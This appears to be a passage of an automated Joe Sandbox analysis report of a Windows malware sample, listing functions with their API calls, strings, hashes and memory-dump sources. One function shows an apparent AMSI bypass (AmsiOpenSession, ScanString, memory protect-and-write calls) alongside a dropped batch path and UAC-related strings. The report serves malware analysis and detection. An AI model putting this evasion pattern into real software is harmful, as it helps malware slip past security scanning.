Opcode Fuzzy Hash: 2126ae12a6544d50e86e3173223823774f6172fed8ad9ad395ca72af591dfd9e
Instruction Fuzzy Hash: 2821EC71A41209BAEB20EAA4CDC2FDEB7BC9B04B04F614561B610F71D0D7B0BB048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0415B5FC Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 04105228: SysAllocStringLen.OLEAUT32(?,?), ref: 04105236

RtlInitUnicodeString.N(?,?,00000000,0415B676), ref: 0415B624
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0415B676), ref: 0415B63A
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0415B676), ref: 0415B659

Part of subcall function 04104F68: SysFreeString.OLEAUT32(0415C89C), ref: 04104F76

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: e1fad5d756584cdc148c06c386c17c77b131ab5c244f971bdd4d8127c3da80ed
Instruction ID: 25c9e5569df4825d8fe6e3fe56fddf461cdc83a68ec801d0fbbd4b1c09f05201
Opcode Fuzzy Hash: e1fad5d756584cdc148c06c386c17c77b131ab5c244f971bdd4d8127c3da80ed
Instruction Fuzzy Hash: 95014F71914208FAEB11EBA0CCC2FCEB3BCEB48704F504561AA10E2590EB74BB04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0411EF94 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 0411EF38: CLSIDFromProgID.OLE32(00000000,?,00000000,0411EF85,?,?,?,00000000), ref: 0411EF65

CoCreateInstance.OLE32(?,00000000,00000005,0411F078,00000000,00000000,0411EFF7,?,00000000,0411F067), ref: 0411EFE3

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 329724137eb9e957bb4e5c804ff8fd249fdb17ac142360fa146ba76207cda658
Instruction ID: 8a57c16a71d20dc87aba4952d925b38fd42a7a0a316ac6651a9c802b5b7c0c9d
Opcode Fuzzy Hash: 329724137eb9e957bb4e5c804ff8fd249fdb17ac142360fa146ba76207cda658
Instruction Fuzzy Hash: BC01A7716087056FE715DFA09C9286EB7ACD749710FA24475FD00D26A0EB747D10C965

Uniqueness

Uniqueness Score: -1.00%

Function 041695F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0416967E), ref: 04169612

Part of subcall function 04147420: GetCurrentProcessId.KERNEL32(?,00000000,04147598), ref: 04147441
Part of subcall function 04147420: GlobalAddAtomA.KERNEL32(00000000), ref: 04147474
Part of subcall function 04147420: GetCurrentThreadId.KERNEL32 ref: 0414748F
Part of subcall function 04147420: GlobalAddAtomA.KERNEL32(00000000), ref: 041474C5
Part of subcall function 04147420: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04147598), ref: 041474DB
Part of subcall function 04147420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04147598), ref: 0414755F
Part of subcall function 04147420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04147570

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
String ID:
API String ID: 3557136124-0
Opcode ID: b78340263f8f8e24abdb821595fa2ae1e4ee3e4ee515104cc9ec8eeb50b2f330
Instruction ID: 0deca2fa700d4f46d0863c9fbd691a9000323258d09b96e5366f91f45796ccf9
Opcode Fuzzy Hash: b78340263f8f8e24abdb821595fa2ae1e4ee3e4ee515104cc9ec8eeb50b2f330
Instruction Fuzzy Hash: E5F06D76319240AFE311FF26EDD182977EAEB8AB053814430E4118B7A5DBBCFC918A54

Uniqueness

Uniqueness Score: -1.00%

Function 04147420 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(?,00000000,04147598), ref: 04147441
GlobalAddAtomA.KERNEL32(00000000), ref: 04147474
GetCurrentThreadId.KERNEL32 ref: 0414748F
GlobalAddAtomA.KERNEL32(00000000), ref: 041474C5
RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04147598), ref: 041474DB

Part of subcall function 04117B44: InitializeCriticalSection.KERNEL32(List,?,?,041474F1,00000000,00000000,?,?,00000000,04147598), ref: 04117B63

Part of subcall function 04147028: SetErrorMode.KERNEL32(00008000), ref: 04147041
Part of subcall function 04147028: GetModuleHandleA.KERNEL32(USER32,00000000,0414718E,?,00008000), ref: 04147065
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04147072
Part of subcall function 04147028: LoadLibraryA.KERNEL32(imm32.dll,00000000,0414718E,?,00008000), ref: 0414708E
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 041470B0
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 041470C5
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 041470DA
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 041470EF
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04147104
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04147119
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0414712E
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04147143
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04147158
Part of subcall function 04147028: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0414716D
Part of subcall function 04147028: SetErrorMode.KERNEL32(?,04147195,00008000), ref: 04147188

Part of subcall function 04151538: GetKeyboardLayout.USER32(00000000), ref: 0415157D
Part of subcall function 04151538: GetDC.USER32(00000000), ref: 041515D2
Part of subcall function 04151538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 041515DC
Part of subcall function 04151538: ReleaseDC.USER32(00000000,00000000), ref: 041515E7

Part of subcall function 04152740: LoadIconA.USER32(00000000,MAINICON), ref: 04152837
Part of subcall function 04152740: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 04152869
Part of subcall function 04152740: OemToCharA.USER32(?,?), ref: 0415287C
Part of subcall function 04152740: CharNextA.USER32(?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528BB
Part of subcall function 04152740: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528C1

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04147598), ref: 0414755F
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04147570

Strings

AnimateWindow, xrefs: 0414756A
USER32, xrefs: 0414755A
Delphi%.8X, xrefs: 04147452
ControlOfs%.8X%.8X, xrefs: 041474A3

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 1515865724-1126952177
Opcode ID: cdce5071681897280cb3ba5366be70415ada1eac1762ca9322d3397a2fb6b9b8
Instruction ID: e7dacbdc641b67b0c0d5f959da387a12537216a70b77fd111f0a040773fbd2d4
Opcode Fuzzy Hash: cdce5071681897280cb3ba5366be70415ada1eac1762ca9322d3397a2fb6b9b8
Instruction Fuzzy Hash: 97415BB4A102459FEB00FFB9E9C0A9E77F9EB49308B008524E515EB390DB79BD458F64

Uniqueness

Uniqueness Score: -1.00%

Function 0415BCF8 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,0428EBB8,0428EBFC,ScanString,0419A350,0415C330,OpenSession,0419A350), ref: 0415C05F
WaitForSingleObject.KERNEL32(000008B0,000000FF,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,UacScan,0419A350), ref: 0415C2AB
CloseHandle.KERNEL32(000008B0,000008B0,000000FF,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,UacScan), ref: 0415C2B6
CloseHandle.KERNEL32(000008AC,000008B0,000008B0,000000FF,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330,ScanString,0419A350,0415C330,OpenSession,0419A350,0415C330), ref: 0415C2C1

Strings

*"C:\Users\Public\Libraries\AkaelkovO.bat" , xrefs: 0415BE69, 0415C029
UacScan, xrefs: 0415BD31, 0415BED5, 0415C06B
ScanString, xrefs: 0415BDE3, 0415BF87, 0415C14D, 0415C239
Amsi, xrefs: 0415BE9D
OpenSession, xrefs: 0415BD8A, 0415BF2E, 0415C0DC, 0415C1C8
AmsiOpenSession, xrefs: 0415BE8C

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: HandleProcess$CloseCurrentLibraryMemoryVirtual$AddressCreateFreeLoadModuleObjectProcProtectSingleUserWaitWrite
String ID: *"C:\Users\Public\Libraries\AkaelkovO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
API String ID: 2776809114-3788145045
Opcode ID: e7b6a40ed5a7f9e40cbd62d7777850a44f92ff17b98af2c7dcc28c39e46d72a6
Instruction ID: 63fbccb325d945906bdc27eee54116c3773910837cf3c959c5beb6e03c14a66b
Opcode Fuzzy Hash: e7b6a40ed5a7f9e40cbd62d7777850a44f92ff17b98af2c7dcc28c39e46d72a6
Instruction Fuzzy Hash: 5BF1FD35A0121DDBEB10FBA4D9C1BDEB3B9EF84204F1181A5E504AB2A4DBB0BD45CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04152740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(00000000,MAINICON), ref: 04152837
GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 04152869
OemToCharA.USER32(?,?), ref: 0415287C
CharNextA.USER32(?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528BB
CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04147530,00000000,00000000,?,?,00000000,04147598), ref: 041528C1

Part of subcall function 04152A94: GetClassInfoA.USER32(04100000,04152730,?), ref: 04152AF3
Part of subcall function 04152A94: RegisterClassA.USER32(0416B650), ref: 04152B0B
Part of subcall function 04152A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04152BA7
Part of subcall function 04152A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04152BC9

Strings

MAINICON, xrefs: 0415282A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: MAINICON
API String ID: 2763768735-2283262055
Opcode ID: e5bef8ef5667d7c33d26a51dc25d57aea90a4b9b8acdd4b46644b0787a77effa
Instruction ID: fa06f7135b837ff34c0693914c569729aa6941956c53a6e413830b6006df07fd
Opcode Fuzzy Hash: e5bef8ef5667d7c33d26a51dc25d57aea90a4b9b8acdd4b46644b0787a77effa
Instruction Fuzzy Hash: E2514D70604244DFEB50EF68C8C4BC57BE4AB15308F4481F5DC58CF3A6DBB9A9888B61

Uniqueness

Uniqueness Score: -1.00%

Function 041017C0 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,0410209C), ref: 0410186C
Sleep.KERNEL32(0000000A,00000000,?,0410209C), ref: 04101882

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 76f23860b16538861365b08078358ea47bcc19cc3907be54f17334a75c235170
Instruction ID: 736a8cffefacc9563b6fb99c1dfb7d152ee160b36f7b09d1ef5b115bbfc705a4
Opcode Fuzzy Hash: 76f23860b16538861365b08078358ea47bcc19cc3907be54f17334a75c235170
Instruction Fuzzy Hash: B5B11372610210DBD719CF29E8C4365BBE1FB85320F18C2AED4698B3C4DBB9AC81C790

Uniqueness

Uniqueness Score: -1.00%

Function 04101B28 Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,04102080), ref: 04101BB3
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,04102080), ref: 04101BCD

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a4eb0370e731bd3c9d9bce5d908c67a95f910f52739804d152cbcd79604d3d54
Instruction ID: 27d75cae41ca39b522bcb8ac2703a1ef07f0c6b3ad306d93a66867e4b55c445b
Opcode Fuzzy Hash: a4eb0370e731bd3c9d9bce5d908c67a95f910f52739804d152cbcd79604d3d54
Instruction Fuzzy Hash: 0B51D171610300AFE7198F68DAC4756BBE0EF45324F18C5AEE4448B2C1EBFAE984C791

Uniqueness

Uniqueness Score: -1.00%

Function 0412765C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 04127682

Part of subcall function 04127618: GetDC.USER32(00000000), ref: 04127621
Part of subcall function 04127618: SelectObject.GDI32(00000000,058A00B4), ref: 04127633
Part of subcall function 04127618: GetTextMetricsA.GDI32(00000000), ref: 0412763E
Part of subcall function 04127618: ReleaseDC.USER32(00000000,00000000), ref: 0412764F

Strings

Tahoma, xrefs: 041276A4
MS Shell Dlg 2, xrefs: 041276EC
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 041276D8

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 2013942131-1011973972
Opcode ID: 946c90fddc20533e62fe5f3189b524a517498c246fbf4e892b2d500fff3d0221
Instruction ID: f0045be429b79616b246e32d9c8d9cca65e41bd66f187741aff73fbe30f05544
Opcode Fuzzy Hash: 946c90fddc20533e62fe5f3189b524a517498c246fbf4e892b2d500fff3d0221
Instruction Fuzzy Hash: 4A11E330600218AFFB11EFA8DBC195E7BA5EB0A604F5045A0E910E7690CB35FE21CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0411EA38 Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(04100000,0411EA28,?), ref: 0411EA59
UnregisterClassA.USER32(0411EA28,04100000), ref: 0411EA82
RegisterClassA.USER32(0416AAF8), ref: 0411EA8C
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0411EAD7

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 5790301f717812e3f0ad71b77c2ee73b24b32715fcb2779cd02a1c5a937cf2a5
Instruction ID: 445af86f888c22a9a9019e3a0d80488cfb4aceb20acc92371a6c3a087600c8fe
Opcode Fuzzy Hash: 5790301f717812e3f0ad71b77c2ee73b24b32715fcb2779cd02a1c5a937cf2a5
Instruction Fuzzy Hash: 8B015BB1640204ABEA00EB99ADC0E9A379DEB09318F108165F919FB2D1DB75FC918B60

Uniqueness

Uniqueness Score: -1.00%

Function 04120308 Relevance: 4.6, APIs: 3, Instructions: 132registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 04120374
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,041204A2), ref: 041203DF
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 04120444

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: fcc92235cfe9e59ee81c499a9268907fee4c1f5523acf91d03b5da96cc48d60c
Instruction ID: 4d2eced05f47001b522e1bb770e4ce350e912daa47c7f75bb7797bfea92d29b3
Opcode Fuzzy Hash: fcc92235cfe9e59ee81c499a9268907fee4c1f5523acf91d03b5da96cc48d60c
Instruction Fuzzy Hash: B3418A30B00758AFEB11EBA4CAC1B9EBBF9AF48304F118569E544E3291DBB5BF159740

Uniqueness

Uniqueness Score: -1.00%

Function 04119CA0 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,04119DE8,?,?,04115B68,00000001), ref: 04119CFC
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,04119DE8,?,?,04115B68,00000001), ref: 04119D2A

Part of subcall function 04108CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,04115B68,04119D6A,00000000,04119DE8,?,?,04115B68), ref: 04108D2E

Part of subcall function 04108F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,04115B68,04119D85,00000000,04119DE8,?,?,04115B68,00000001), ref: 04108F3B

GetLastError.KERNEL32(00000000,04119DE8,?,?,04115B68,00000001), ref: 04119D8F

Part of subcall function 0410B878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0410D5E5,00000000,0410D63F), ref: 0410B897

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 16b685dbb28485d0dc71977e38e31ff0649a67f11120de51fd40efa87be9827b
Instruction ID: b0c35c98f9a9faed86f6e228ae2c1d60e9e5372a99a27dedf11d9b11872fae00
Opcode Fuzzy Hash: 16b685dbb28485d0dc71977e38e31ff0649a67f11120de51fd40efa87be9827b
Instruction Fuzzy Hash: 33314070A042499FEB00EFA5C9D0B9EBBF5AF49308F508165E514A72D0DBB97E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0415C788 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,0428ED0C), ref: 0415C7CC
RegSetValueExA.ADVAPI32(000008AC,00000000,00000000,00000001,00000000,0000001C,00000000,0415C837), ref: 0415C804
RegCloseKey.ADVAPI32(000008AC,000008AC,00000000,00000000,00000001,00000000,0000001C,00000000,0415C837), ref: 0415C80F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 4a0e4809070496226994b345cf512ec63ac2dc5aa545c140013cce3a428e7f4e
Instruction ID: 1c695b3745f0937a2971311e22112dca79c5725b4673ebff198e2fca9197b5ea
Opcode Fuzzy Hash: 4a0e4809070496226994b345cf512ec63ac2dc5aa545c140013cce3a428e7f4e
Instruction Fuzzy Hash: 08114871600208BFEB00FFA8DDC599E7BFCEB09604F418565F904E72A0DBB4BE118A50

Uniqueness

Uniqueness Score: -1.00%

Function 0410F6D0 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0410F6DF

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2019d2450646760bf734642348acd471d802b1a624ced995ac524ab6b1abf656
Instruction ID: eece8f8a77d6c570f06b040ddf036d34d0f519f700aa4f79670ccc12311d6139
Opcode Fuzzy Hash: 2019d2450646760bf734642348acd471d802b1a624ced995ac524ab6b1abf656
Instruction Fuzzy Hash: A0F0227830020086B7387B388DC65A923889F00648B41C8B5E0429B2D1DFF4FC4BD323

Uniqueness

Uniqueness Score: -1.00%

Function 04105058 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0415C89C), ref: 04104F76
SysAllocStringLen.OLEAUT32(?,?), ref: 04105063
SysFreeString.OLEAUT32(00000000), ref: 04105075

Memory Dump Source

